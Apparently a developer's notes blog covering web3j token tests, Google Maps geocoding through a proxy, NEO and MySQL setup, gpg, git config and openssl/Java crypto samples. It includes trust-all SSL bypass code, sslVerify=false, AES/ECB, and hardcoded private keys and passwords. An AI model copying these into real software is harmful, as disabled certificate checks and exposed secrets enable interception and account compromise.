web3j.bat truffle generate --javaTypes D:\entherumn_env\tutorial-coin\build\contracts\SampleCrowdsale.json -o .\java -p tutorialtoken

Write junit to test the smart contract

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
package tutorialtoken;

import java.io.IOException;
import java.math.BigInteger;
import java.util.List;

import org.apache.log4j.Logger;
import org.junit.Before;
import org.junit.Test;
import org.web3j.crypto.Credentials;
import org.web3j.protocol.Web3j;
import org.web3j.protocol.admin.Admin;
import org.web3j.protocol.admin.methods.response.NewAccountIdentifier;
import org.web3j.protocol.admin.methods.response.PersonalUnlockAccount;
import org.web3j.protocol.core.DefaultBlockParameterName;
import org.web3j.protocol.core.methods.request.Transaction;
import org.web3j.protocol.core.methods.response.EthAccounts;
import org.web3j.protocol.core.methods.response.EthCoinbase;
import org.web3j.protocol.core.methods.response.EthGetBalance;
import org.web3j.protocol.core.methods.response.EthGetTransactionCount;
import org.web3j.protocol.core.methods.response.EthGetTransactionReceipt;
import org.web3j.protocol.core.methods.response.EthSendTransaction;
import org.web3j.protocol.core.methods.response.TransactionReceipt;
import org.web3j.protocol.http.HttpService;
import org.web3j.tx.Contract;

public class TutorialTokenTest {
private Web3j web3j;
private Admin admin;

private EthCoinbase coinbase;
private Credentials coinBaseCredentials;

private String contractAddressOfTT = "0xbea3c4344beb0e0681e3506d2e55315b6efe4c8b";

private static final Logger log = Logger.getLogger(TutorialTokenTest.class);

@Before
public void setup() throws IOException {
web3j = Web3j.build(new HttpService("http://localhost:8545"));
admin = Admin.build(new HttpService("http://127.0.0.1:8545"));

String coinbaseAccountPrivatekey = "0x0d10b7b76213f4b40fc95d8b3c1701213ba66bdd2a778279ad0f6165c51d73c5";
coinBaseCredentials = Credentials.create(coinbaseAccountPrivatekey);

coinbase = web3j.ethCoinbase().send();

web3j.transactionObservable().subscribe(tx -> {
log.info(String.format("New tx: id=%s, block=%s, from=%s, to=%s, value=%s", tx.getHash(), tx.getBlockHash(), tx.getFrom(), tx.getTo(), tx.getValue().intValue()));
});
}

@Test
public void showAccounts() throws IOException {
List<String> account = web3j.ethAccounts().send().getAccounts();
//account.stream().forEach(a -> log.info(a));
account.stream().forEach(System.out::println);

String coinbase = web3j.ethAccounts().send().getAccounts().get(0); // or coinbase = web3j.ethCoinbase().send();
log.info("coinbase = " + coinbase);
}

@Test
public void createAccount() throws IOException {
String password = "12345678";
NewAccountIdentifier newAccountIdentifier = admin.personalNewAccount(password).send();
String address = newAccountIdentifier.getAccountId();
log.info("New account address: " + address);
}

@Test
public void unlockAccount() throws IOException {
String password = "12345678";
NewAccountIdentifier newAccountIdentifier = admin.personalNewAccount(password).send();
String address = newAccountIdentifier.getAccountId();
log.info("New account address 22: " + address);

BigInteger unlockDuration = BigInteger.valueOf(60L);
try {
PersonalUnlockAccount personalUnlockAccount = admin.personalUnlockAccount(address, password, unlockDuration).send();
Boolean isUnlocked = personalUnlockAccount.accountUnlocked();
log.info("Account unlock " + isUnlocked);
} catch (IOException e) {
e.printStackTrace();
}
}

@Test
public void deployContract() throws Exception {
//Credentials credentials = Credentials.create("0xf2064bdf023de8d86e5e4aedc04e3e176f89d8051cedbb95332a7ea9fb99dcc4");
TutorialToken tutorialToken = TutorialToken.deploy(web3j, coinBaseCredentials, Contract.GAS_PRICE, Contract.GAS_LIMIT).send();
if (tutorialToken.getTransactionReceipt().isPresent()) {
log.info("TransactionReceipt: " + tutorialToken.getTransactionReceipt().get());
contractAddressOfTT = tutorialToken.getContractAddress();
log.info("TutorialToken contractAddress: " + contractAddressOfTT);

TutorialToken tutorialToken2 = TutorialToken.load(contractAddressOfTT, web3j, coinBaseCredentials, Contract.GAS_PRICE, Contract.GAS_LIMIT);
log.info("loaded tutorialToken: " + tutorialToken2);
log.info("tutorialToken isValid: " + tutorialToken2.isValid());
}
}

@Test
public void balanceOfTutorialToken() throws Exception {
//Credentials credentials = Credentials.create("0xf2064bdf023de8d86e5e4aedc04e3e176f89d8051cedbb95332a7ea9fb99dcc4");
//String contractAddress = "0x15b4cd705c0646c551e264c3a5f5b0ac0ad0ad09";

TutorialToken tutorialToken = TutorialToken.load(contractAddressOfTT, web3j, coinBaseCredentials, Contract.GAS_PRICE, Contract.GAS_LIMIT);
BigInteger balance = tutorialToken.balanceOf("0x231cbc2edc97071b903aed2e7d90ec792c08c57e").send();
log.info("TT balance: " + balance);
}

@Test
public void transferTutorialToken() throws Exception {
List<String> account = web3j.ethAccounts().send().getAccounts();
String account1 = account.get(0);
String account2 = account.get(1);

//String contractAddress = "0x15b4cd705c0646c551e264c3a5f5b0ac0ad0ad09";

TutorialToken tutorialToken = TutorialToken.load(contractAddressOfTT, web3j, coinBaseCredentials, Contract.GAS_PRICE, Contract.GAS_LIMIT);
TransactionReceipt receipt = tutorialToken.transfer(account2, BigInteger.valueOf(2000)).send();
log.info(String.format("New tx: id=%s, block=%s, from=%s, to=%s", receipt.getTransactionHash(), receipt.getBlockHash(), receipt.getFrom(), receipt.getTo()));

BigInteger balance = tutorialToken.balanceOf(account1).send();
log.info("TT balance: " + balance);

BigInteger balance2 = tutorialToken.balanceOf(account2).send();
log.info("balance2: " + balance2);

tutorialToken.getTransferEvents(receipt).forEach(resp -> {
log.info("TT transaction, from: " + resp.from + ", to: " + resp.to);
});
}

@Test
public void etherBalance() throws IOException {
EthGetTransactionCount transactionCount = web3j.ethGetTransactionCount(coinbase.getAddress(), DefaultBlockParameterName.LATEST).send();
Transaction transaction = Transaction.createEtherTransaction(coinbase.getAddress(), transactionCount.getTransactionCount(), BigInteger.valueOf(20_000_000_000L), BigInteger.valueOf(21_000),
coinBaseCredentials.getAddress(), BigInteger.valueOf(25_000_000_000_000_000L));
web3j.ethSendTransaction(transaction).send();
EthGetBalance balance = web3j.ethGetBalance(coinBaseCredentials.getAddress(), DefaultBlockParameterName.LATEST).send();
log.info("Ether Balance: " + balance.getBalance().longValue());
}

@Test
public void etherTransfer() throws IOException {
EthAccounts accounts = web3j.ethAccounts().send();
for (int i = 1; i < accounts.getAccounts().size(); i++) {
EthGetTransactionCount transactionCount = web3j.ethGetTransactionCount(coinbase.getAddress(), DefaultBlockParameterName.LATEST).send();
Transaction transaction = Transaction.createEtherTransaction(coinbase.getAddress(), transactionCount.getTransactionCount(), Contract.GAS_PRICE, Contract.GAS_LIMIT,
accounts.getAccounts().get(i), BigInteger.valueOf(25_000_000_000L));

EthSendTransaction response = web3j.ethSendTransaction(transaction).send();
if (response.getError() != null) {
log.error(String.format("Transaction error: %s", response.getError().getMessage()));
}

log.info(String.format("Transaction: %s, TransactionHash: %s", response.getResult(), response.getTransactionHash()));
EthGetTransactionReceipt receipt = web3j.ethGetTransactionReceipt(response.getTransactionHash()).send();
/*if (receipt.getTransactionReceipt().isPresent()) {
TransactionReceipt r = receipt.getTransactionReceipt().get();
log.info(String.format("Tx receipt: from=%s, to=%s, gas=%s, cumulativeGas=%s", r.getFrom(), r.getTo(), r.getGasUsed().intValue(), r.getCumulativeGasUsed().intValue()));
}*/

receipt.getTransactionReceipt()
.ifPresent(r -> log
.info(String.format("Tx receipt: from=%s, to=%s, gas=%s, cumulativeGas=%s", r.getFrom(), r.getTo(), r.getGasUsed().intValue(), r.getCumulativeGasUsed().intValue())));

EthGetBalance balance = web3j.ethGetBalance(accounts.getAccounts().get(i), DefaultBlockParameterName.LATEST).send();
log.info(String.format("Ether Balance: address=%s, amount=%s", accounts.getAccounts().get(i), balance.getBalance().longValue()));
}
}
}

Request ether from Rinkeby

https://gist.github.com/cryptogoth/10a98e8078cfd69f7ca892ddbdcf26bc

1
2
3
4
windows 1: geth --datadir=./.rinkeby attach ipc:\\.\pipe\geth.ipc console
windows 2: geth attach ipc:\\.\pipe\geth.ipc
> personal.newAccount("notmyrealpassword")
> eth.getBalance(eth.coinbase)

Go to https://www.rinkeby.io/#faucet and copy your post
Or
http://rinkeby-faucet.com/
https://rinkeby.etherscan.io/balancecheck-tool
https://ethereum.stackexchange.com/questions/34718/how-do-i-buy-tokens-on-the-rinkeby-test-environment

Register a infura.io account to get a access-api through https:/infura.io/register

endpoint: https://rinkeby.infura.io/v3/your-api
note that rinkeby does not support following method

1
2
3
web3j.transactionObservable().subscribe(tx -> {
log.info(String.format("New tx: id=%s, block=%s, from=%s, to=%s, value=%s", tx.getHash(), tx.getBlockHash(), tx.getFrom(), tx.getTo(), tx.getValue().intValue()));
});

Reference

https://stevenocean.github.io/2018/04/06/web3j-ethereum-token.html
https://dzone.com/articles/intro-to-blockchain-with-ethereum-web3j-and-spring
https://www.codeooze.com/categories/blockchain/

https://truffleframework.com/tutorials/pet-shop
https://truffleframework.com/docs/truffle/testing/writing-tests-in-javascript
https://truffleframework.com/tutorials/robust-smart-contracts-with-openzeppelin
https://metamask.io
https://medium.com/@dmihal/create-an-erc20-token-using-zeppelin-ethpm-fc99f794d153

https://github.com/eugenp/tutorials/tree/master/ethereum
https://docs.web3j.io/getting_started.html#transactions
https://piotrminkowski.wordpress.com/2018/06/22/introduction-to-blockchain-with-java-using-ethereum-web3j-and-spring-boot/
https://github.com/piomin/sample-spring-blockchain-contract

https://cryptozombies.io

https://theethereum.wiki/w/index.php/ERC20_Token_Standard

crowdsale

https://github.com/TokenMarketNet/ico
https://medium.com/@VladimirTikhomirov/how-its-made-crowdsale-contract-1120b487cc4a
https://www.ethereum.org/crowdsale
https://blog.zeppelin.solutions/how-to-create-token-and-initial-coin-offering-contracts-using-truffle-openzeppelin-1b7a5dae99b6
https://github.com/OpenZeppelin/openzeppelin-solidity/blob/master/contracts/examples/SampleCrowdsale.sol

google map geocode okhttp proxy

In order to call google-maps geocode web service, we used library google-maps-services-java,

https://github.com/googlemaps/google-maps-services-java

Sample of call geocdoe web service

https://maps.googleapis.com/maps/api/geocode/json?address=1%20kowloon

Since the keystore xx_egis.jks is configured for ssl trust store in wildfly with -Djavax.net.ssl.trustStore=xx_egis.jks, we have two ways to call the ssl web service,

1. bypass the ssl certificate validation

After investigation on the api of library google-maps-services-java, found that it did not expose the underly okhttp3.OkHttpClient, so it cannot apply following sample code to bypass ssl certificate validation,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
private static OkHttpClient.Builder configureToIgnoreCertificate(OkHttpClient.Builder builder) {
LOGGER.warn("Ignore Ssl Certificate");
try {

// Create a trust manager that does not validate certificate chains
final TrustManager[] trustAllCerts = new TrustManager[] {
new X509TrustManager() {
@Override
public void checkClientTrusted(java.security.cert.X509Certificate[] chain, String authType)
throws CertificateException {
}

@Override
public void checkServerTrusted(java.security.cert.X509Certificate[] chain, String authType)
throws CertificateException {
}

@Override
public java.security.cert.X509Certificate[] getAcceptedIssuers() {
return new java.security.cert.X509Certificate[]{};
}
}
};

// Install the all-trusting trust manager
final SSLContext sslContext = SSLContext.getInstance("SSL");
sslContext.init(null, trustAllCerts, new java.security.SecureRandom());
// Create an ssl socket factory with our all-trusting manager
final SSLSocketFactory sslSocketFactory = sslContext.getSocketFactory();

builder.sslSocketFactory(sslSocketFactory, (X509TrustManager)trustAllCerts[0]);
builder.hostnameVerifier(new HostnameVerifier() {
@Override
public boolean verify(String hostname, SSLSession session) {
return true;
}
});
} catch (Exception e) {
LOGGER.warn("Exception while configuring IgnoreSslCertificate" + e, e);
}
return builder;
}

2. Add the ssl certificate to trust store (xx_egis.jks)

Run following command:

openssl s_client -connect maps.googleapis.com:443 -showcerts

Save the certificate (within —–BEGIN CERTIFICATE—– … —–END CERTIFICATE—–) as file google.maps.api.crt (reminder: save the root ca certificate, not the website certificate)

Import the certificate to trust store

keytool -import -trustcacerts -v -alias maps.googleapis.com -file google.maps.api.crt -keystore xx_egis.jks -storepass dxc.xx@2017

List the latest certificates in trust store, it should contain following entries,

1
2
3
4
5
6
7
8
9
10
11
keytool -list -keystore xx_egis.jks -storepass dxc.xx@2017
payment_signing, 201827日, trustedCertEntry,
憑證指紋 (SHA1): 6B:EA:31:51:8D:F8:81:3B:D8:D1:D8:0C:E7:22:12:21:96:E9:59:26
rootca, 2017822日, trustedCertEntry,
憑證指紋 (SHA1): C7:2C:81:6D:EB:2D:C7:36:63:90:D3:68:2D:57:F1:8F:C5:37:AF:DA
friendly3, 201819日, PrivateKeyEntry,
憑證指紋 (SHA1): CF:42:5A:D1:FB:A1:8F:AA:81:B5:76:F2:39:31:D6:4F:65:88:1A:A1
trust1, 2017822日, trustedCertEntry,
憑證指紋 (SHA1): C4:F1:83:51:20:55:BC:66:2F:D7:BA:F4:D4:7B:C9:43:95:9D:E2:D6
maps.googleapis.com, 2018725日, trustedCertEntry,
憑證指紋 (SHA1): EE:AC:BD:0C:B4:52:81:95:77:91:1E:1E:62:03:DB:26:2F:84:A3:18

My test program to call geocode web service

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
package test;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.InetSocketAddress;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;

import com.google.maps.GeoApiContext;
import com.google.maps.GeocodingApi;
import com.google.maps.errors.ApiException;
import com.google.maps.model.GeocodingResult;
import com.google.maps.model.Geometry;

import okhttp3.Headers;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.Response;

public class ConnectionThrProxy {

public static void main(String[] args) throws IOException {
//normalCall();
//okhttpCall();
mapCall();
}

private static void normalCall() throws IOException {
//System.setProperty("http.proxyHost", "proxy1.govcloud.gov.hk");
//System.setProperty("http.proxyPort", "4005");

URL url = new URL("http://www.google.com/");

String proxyAddress = "proxy1.govcloud.gov.hk";
Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxyAddress, 4005));

URLConnection con = url.openConnection(proxy);

BufferedReader in = new BufferedReader(new InputStreamReader(
con.getInputStream()));

// Read it ...
String inputLine;
while ((inputLine = in.readLine()) != null)
System.out.println(inputLine);

in.close();
}

private static void okhttpCall() throws IOException {
String proxyAddress = "proxy1.govcloud.gov.hk";
Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxyAddress, 4005));

OkHttpClient.Builder builder = new OkHttpClient.Builder().proxy(proxy);
OkHttpClient client = builder.build();

Request request = new Request.Builder()
.url("https://publicobject.com/helloworld.txt")
.build();

try (Response response = client.newCall(request).execute()) {
if (!response.isSuccessful())
throw new IOException("Unexpected code " + response);

Headers responseHeaders = response.headers();
for (int i = 0; i < responseHeaders.size(); i++) {
System.out.println(responseHeaders.name(i) + ": " + responseHeaders.value(i));
}

System.out.println(response.body().string());
}
}

private static void mapCall() {
String googleMapKey = "key-id";
String proxyAddress = "proxy1.govcloud.gov.hk";
Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxyAddress, 4005));
GeoApiContext context = new GeoApiContext.Builder().apiKey(googleMapKey).proxy(proxy).build();

GeocodingResult[] results;

String address = "16 FLOOR EMPEROR COMMERCIAL CENTRE 39 DES VOEUX ROAD CENTRAL CENTRAL HONG KONG";
try {
results = GeocodingApi.geocode(context, address).await();
if (results.length > 0) {
Geometry geometry = results[0].geometry;

double lat = geometry.location.lat;
double lng = geometry.location.lng;
String locType = geometry.locationType.toString();
String formattedAddr = results[0].formattedAddress;
System.out.println("formattedAddr " + formattedAddr);

System.out.println("lat " + lat);
System.out.println("lng " + lng);
//printGeoResult(appl.getEngApplName(), results);
} else {
System.out.println("no geo result returned for address {}" + address);
}
} catch (ApiException | InterruptedException | IOException e) {
System.out.println("findGeoLocation" + e);
}

}
}

Run the program with showing detail debug message

Folder structure

1
2
3
4
5
6
7
8
9
10
11
ConnectionThrProxy.class

lib/
google-maps-services-0.2.8.jar
gson-2.8.0.jar
joda-time-2.10.jar
okhttp-3.8.1.jar
okio-1.13.0.jar
slf4j-api-1.7.24.jar

java -cp ".;lib/*" -Djavax.net.ssl.trustStore=xx_egis.jks -Djavax.net.debug=ssl test.ConnectionThrProxy

SSL debug parameter for reference
-Djavax.net.debug=ssl | -Djavax.net.debug=all

Install neo project

Install dotnet core

1
2
download dotnet-sdk-2.1.200-linux-x64.tar.gz
tar zxf dotnet-sdk-2.1.200-linux-x64.tar.gz

Install cmake

1
2
wget https://cmake.org/files/v3.11/cmake-3.11.2-Linux-x86_64.tar.gz
tar xvf cmake-3.11.2-Linux-x86_64.tar.gz

Config cmake in environment path
PATH=$PATH:$HOME/.local/bin:$HOME/bin:/home/ec2-user/neo/dotnet-core:/home/ec2-user/neo/leveldb/cmake-3.11.2-Linux-x86_64/bin

Install snappy

1
2
git clone https://github.com/google/snappy
cd snappy/

we need to build a share object of snappy lib, change file CMakeLists.txt as below

option(BUILD_SHARED_LIBS "Build shared libraries(DLLs)." OFF)
=>
option(BUILD_SHARED_LIBS "Build shared libraries(DLLs)." ON)

Run commands below to install snappy share object

1
2
3
4
5
mkdir build 
cd build
cmake ../
make
sudo make install

neo-leveldb (not google) (obsolated)

1
2
3
4
5
6
7
8
git clone https://github.com/neo-project/leveldb
make
cd out-shared/
sudo cp libleveldb.so.1.19 /usr/local/lib64/
cd /usr/local/lib64/
sudo ln -s libleveldb.so.1.19 libleveldb.so.1
sudo ln -s libleveldb.so.1 libleveldb.so
sudo ldconfig -v

leveldb (google)

1
2
3
4
5
6
7
wget https://github.com/google/leveldb/archive/master.zip
unzip master.zip
cd leveldb-master/
mkdir -p build && cd build
cmake -DCMAKE_BUILD_TYPE=Release -DBUILD_SHARED_LIBS=on .. && cmake --build .
sudo cp -p libleveldb.so /usr/local/lib64/
sudo ldconfig -v

neo-cli

1
2
3
4
5
6
git clone https://github.com/neo-project/neo-cli
cd neo-cli
dotnet publish -c Release
dotnet /home/ec2-user/neo/neo-cli/neo-cli/bin/Release/netcoreapp2.0/publish/neo-cli.dll .
>> show state
>> create wallet wallet.db3

neo-compile

1
2
git clone https://github.com/neo-project/neo-compiler
dotnet publish -c Release

recover-replication-on-mysql

  • Stop data sync on slave node

    1
    2
    3
    mysql -uroot -pcR@2017 xxx_prd
    > show slave status \G;
    > stop slave;
  • export data from master node

    1
    2
    3
    mysqldump -uroot -pcR@2017 -c psct_prd --no-data any_table1, any_table2 > xxx_prd_schema-only-Dump20180228.sql

    mysqldump -uroot -pcR@2017 -c psct_prd | sed 's/ AUTO_INCREMENT=[0-9]*//g' > xxx_prd_dmp_20190524.sql(export all data)
  • Using Search and Replace to remove *auto_increment=DE to DE directive since the exported schema sql included auto_increment value (no need as use sed to filter auto increment)

  • Show status on master node

    1
    2
    3
    4
    SHOW MASTER STATUS\G;
    show master logs;\G
    show binlog events\G;
    show variables like 'log_%';
  • create replication user if neccessary

    1
    2
    3
    4
    > CREATE USER replication@slave_node;
    > GRANT REPLICATION SLAVE ON *.* TO replication@slave_node IDENTIFIED BY 'password';
    > FLUSH privileges;
    > SHOW MASTER STATUS
  • import data from master node

    1
    mysql -uroot -pcR@2017 xxx_prd < xxx_prd.sql
  • start slave to replicate data from binlog.000198

    1
    2
    3
    4
    5
    6
    7
    change master to
    master_host='master_node',
    master_port=3306,
    master_user='replication',
    master_password='password',
    master_log_file='mysql-bin.000198',
    master_log_pos=821;

    Or just run as below to update master info and relay log info, please check whether relay-log.info is updated and check progress of data replication.
    change master to master_log_file='mysql-bin.000198',master_log_pos=821;

Then start slave process
start slave;

gpg

  • list public key pubring
    gpg -k

    1
    2
    3
    4
    5
    6
    7
    pub   4096R/7BB9E54D 2014-03-10
    uid EGIS PPS UAT (PPS Testing cert) <egis_support@ogcio.gov.hk>
    sub 4096R/C35F602F 2014-03-10

    pub 4096R/0490D4D2 2017-11-02 [expires: 2019-11-02]
    uid Mars Registry (For PPS Recon. File Encryption) <mars@gmail.com>
    sub 4096R/B3D05CBB 2017-11-02 [expires: 2019-11-02]
  • list private key secring
    gpg -K

    1
    2
    3
    4
    5
    6
    7
    sec   4096R/7BB9E54D 2014-03-10
    uid EGIS PPS UAT (PPS Testing cert) <egis_support@ogcio.gov.hk>
    ssb 4096R/C35F602F 2014-03-10

    sec 4096R/0490D4D2 2017-11-02 [expires: 2019-11-02]
    uid Mars Registry (For PPS Recon. File Encryption) <mars@gmail.com>
    ssb 4096R/B3D05CBB 2017-11-02
  • export public key
    gpg --export --armor 0490D4D2 > ogcio_pps.pub

  • export private key
    gpg --export-secret-keys --armor 0490D4D2 > ogcio_pps.sec

  • list key details to get the key id
    gpg --export 0490D4D2|gpg --list-packets --verbose

  • get key id from gpg file
    gpg --list-packets <filename>

  • sign file
    gpg --output doc.sig --sign doc (default output is doc.gpg)
    gpg --output doc.sig --clearsign doc => (clear text signature)

  • verify and decrypt
    gpg doc.sig

  • sign detached
    gpg --output doc.sig --detach-sig doc

  • verify
    gpg --verify doc.sig doc

git config

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
[core]
repositoryformatversion = 0
filemode = false
bare = false
logallrefupdates = true
symlinks = false
ignorecase = true
hideDotFiles = dotGitOnly
[alias]
st=status
ci=commit
co=checkout
br=branch
di=difftool
mt=mergetool
[remote "origin"]
url = https://192.168.1.107/git/my-repo.git
fetch = +refs/heads/*:refs/remotes/origin/*
[remote "usb"]
url = G:\\share_drive\\Other\\my-repo.git
fetch = +refs/heads/*:refs/remotes/origin/*

[diff]
tool = bc3
[difftool]
prompt = false
[difftool "bc3"]
#use cygpath to transform cygwin path $LOCAL (something like /tmp/U5VvP1_abc) to windows path, because bc3 is a windows software
#cmd = \"c:/program files/beyond compare 3/bcomp.exe\" "$(cygpath -w $LOCAL)" "$REMOTE"
cmd = \"C:/Software/Beyond Compare 3/bcomp.exe\" \"$LOCAL\" \"$REMOTE\"
[merge]
tool = bc3
[mergetool]
prompt = false
[mergetool "bc3"]
#trustExitCode = true
cmd = \"C:/Software/Beyond Compare 3/bcomp.exe\" "$LOCAL" "$REMOTE" "$BASE" "$MERGED"

[user]
name = Forrest Wan
email = forestwwk@gmail.com
[http]
#proxy = http://proxy1.scig.gov.hk:8080
sslVerify=false
[https]
#proxy = http://proxy1.scig.gov.hk:8080
[credential]
helper = store

Openssl Hash Crypto Sign Verify

Random

openssl rand -base64 32
==>

1
2
3
4
Generally, salt is produced with class SecureRandom
SecureRandom random = new SecureRandom();
byte[] salt = new byte[32];
random.nextBytes(salt);

Other ways

1
2
3
date +%s | sha256sum | base64 | head -c 32 ; echo
date | md5sum
tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1

Reference
https://www.howtogeek.com/howto/30184/10-ways-to-generate-a-random-password-from-the-command-line/

Hash

Encoding with hex(hexdump or xxd)/base64 and openssl base64

echo -n AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=|base64 -d > salt.txt
==>
echo -n AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=|openssl base64 -d > salt.txt

cat salt.txt|base64
==>
cat salt.txt|openssl base64 Display the character “AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=”

hexdump -C salt.txt OR cat salt.txt |hexdump -C OR xxd salt.txt
==>

1
2
3
4
5
JAVA code
BASE64Decoder decoder = new BASE64Decoder();
for (byte b : decoder.decodeBuffer("AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=")) {
System.out.printf("%02x", b); // same as encoded by xxd -p
}

To decode hexadecimal number, using echo -n '0: 50617373776f72643031' | xxd -r => Password01 OR echo -n 50617373776f72643031 | xxd -r -p

Message Digest or Hash: md5sum, sha1sum, sha256sum and openssl md5, sha1, sha256, sha512

md5sum salt.txt == cat salt.txt |openssl md5 == openssl dgst -md5 -hex salt.txt == openssl md5 < salt.txt
sha1sum salt.txt == cat salt.txt |openssl sha1 == openssl dgst -sha1 -hex salt.txt == openssl sha1 < salt.txt
sha256sum salt.txt == cat salt.txt |openssl sha256 == openssl dgst -sha256 -hex salt.txt == openssl sha256 < salt.txt
sha512sum salt.txt == cat salt.txt |openssl sha256 == openssl dgst -sha512 -hex salt.txt == openssl sha512 < salt.txt

Hash password with salt [sha512(salt+password)]

1
2
3
4
echo Password01 > pass.txt (or with -n to remove the \n or using printf)
cat salt.txt pass.txt > combined.txt
tr -d '\n' < combined.txt > combined2.txt // remove the \n
sha512sum combined2.txt

==>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
JAVA code
MessageDigest md = MessageDigest.getInstance("SHA-512");
BASE64Decoder decoder = new BASE64Decoder();

ByteArrayOutputStream array = new ByteArrayOutputStream();
array.write(d.decodeBuffer("AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=")); // salt
array.write("Password01".getBytes()); // password

/* Same as below
md.update(d.decodeBuffer("AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=")); // salt
md.update("Password01".getBytes()); // password
*/

for (byte b : md.digest(array.toByteArray())) {
System.out.printf("%02x", b);
}

Encrypt/Decrypt

Symmetric crypto with AES

Encrypt using salt

1
2
echo "randomprhase" | openssl aes-128-cbc -out message.enc (default with salt)
echo "randomprhase" | openssl aes-128-cbc -nosalt -out nosalt.enc (without salt)

Reference: http://stackoverflow.com/questions/7303103/java-aes-encryption-with-salt

Encryption by openssl and java

1
2
3
echo -n qkjll5@2md3gs5Q@|xxd -p ==> 716b6a6c6c3540326d643367733551400a

echo -n secret | openssl enc -aes-128-ecb -K 716b6a6c6c3540326d643367733551400a -a

=>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
public class CipherTest {

private static final String ALGORITHM = "AES/ECB/PKCS5Padding";
private static byte[] keyValue = "qkjll5@2md3gs5Q@".getBytes(); // key length should be 16

public static String encrypt(String valueToEnc) throws Exception {
Key key = generateKey();
Cipher c = Cipher.getInstance(ALGORITHM);
c.init(Cipher.ENCRYPT_MODE, key);
byte[] encValue = c.doFinal(valueToEnc.getBytes());
String encryptedValue = new BASE64Encoder().encode(encValue);
return encryptedValue;
}

public static String decrypt(String encryptedValue) throws Exception {
Key key = generateKey();
Cipher c = Cipher.getInstance(ALGORITHM);
c.init(Cipher.DECRYPT_MODE, key);
byte[] decordedValue = new BASE64Decoder().decodeBuffer(encryptedValue);
byte[] decValue = c.doFinal(decordedValue);
String decryptedValue = new String(decValue);
return decryptedValue;
}

private static Key generateKey() throws Exception {
Key key = new SecretKeySpec(keyValue, "AES");
// SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(ALGORITHM);
// key = keyFactory.generateSecret(new DESKeySpec(keyValue));
return key;
}

public static void main(String[] args) throws Exception {
String password = "secret";
String passwordEnc = CipherTest.encrypt(password);
String passwordDec = CipherTest.decrypt(passwordEnc);

System.out.println("Plain Text : " + password);
System.out.println("Encrypted : " + passwordEnc);
System.out.println("Decrypted : " + passwordDec);
}
}

For cbc or cfb, iv should be provided. In java code, the IvParameterSpec is need to define.

Openssl encryption sample

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
echo '0: 63616e746765747468697332776f726b' | xxd -r | openssl enc -aes-128-ecb -a -K 00000000000000000000000000000000
=>
N2+bVLU8fIS7ucFW1Qr/xwFD22PuZrDN/59pkXaAFR4= (base64 encoded with option -a)

echo '0: 63616e746765747468697332776f726b' | xxd -r | openssl enc -aes-128-ecb -nopad -K 00000000000000000000000000000000|xxd -p
=>
376f9b54b53c7c84bbb9c156d50affc7 (hex encoded with options -nopad, and xxd -p)

echo '0: 63616e746765747468697332776f726b' | xxd -r | openssl enc -aes-128-ecb -nopad -K 00000000000000000000000000000000|xxd |cut -c10-50
=>
376f 9b54 b53c 7c84 bbb9 c156 d50a ffc7 (hex encoded with cut -c10-50)

echo -n '63616e746765747468697332776f726b' | xxd -r -p | openssl enc -aes-128-ecb -nopad -K 00000000000000000000000000000000|xxd |cut -c10-50
=>
376f 9b54 b53c 7c84 bbb9 c156 d50a ffc7 (xxd -r -p and hex encoded with cut -c10-50)

Reference: http://stackoverflow.com/questions/38082644/how-to-generate-the-output-in-hexadecimal-in-openssl

Asymmetric crypto with RSA

Generate key, publicKey

1
2
3
4
5
openssl genrsa -out key.pem
openssl rsa -in key.pem -pubout > key-pub.pem

openssl rsautl -encrypt -in pass.txt -pubin -inkey key-pub.pem -out pass.encrypted
openssl rsautl -decrypt -in pass.encrypted -inkey key.pem

Encrypt/decrypt with base64/hex encode/decode (Interesting)

1
2
3
echo -n test | openssl rsautl -encrypt -pubin -inkey key-pub.pem | base64 | base64 -d|openssl rsautl -decrypt -inkey key.pem => test

